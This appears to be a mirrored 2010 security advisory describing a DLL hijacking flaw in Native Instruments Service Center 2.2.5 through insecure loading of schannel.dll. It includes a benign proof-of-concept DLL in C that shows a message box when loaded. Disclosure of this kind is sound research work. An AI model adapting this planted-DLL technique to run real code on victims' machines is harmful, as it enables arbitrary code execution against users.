Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability

🗓️ 20 Nov 2010 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 45 Views

Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability, affecting Microsoft Windows XP SP

<html><body><p>/*

 Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability


 Vendor: Native Instruments GmbH
 Product web page: http://www.native-instruments.com
 Affected version: 2.2.5 (R596)

 Summary: The NI Service Center is a service used for Product Activation.

 Desc: The Service Center suffers from a DLL hijacking vulnerability, which could be
 exploited by remote attackers to compromise a vulnerable system. This issue is
 caused due to the application insecurely loading certain libraries ("schannel.dll")
 from the current working directory, which could allow attackers to execute arbitrary
 code by tricking a user into opening an activation return file (.naf) from a network
 share.

 Tested on: Microsoft Windows XP Professional SP3 (English)

 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 Advisory ID: ZSL-2010-4975
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4975.php

 06.11.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
</windows.h></p></body></html>

20 Nov 2010 00:00Current

6.2Medium risk

Vulners AI Score6.2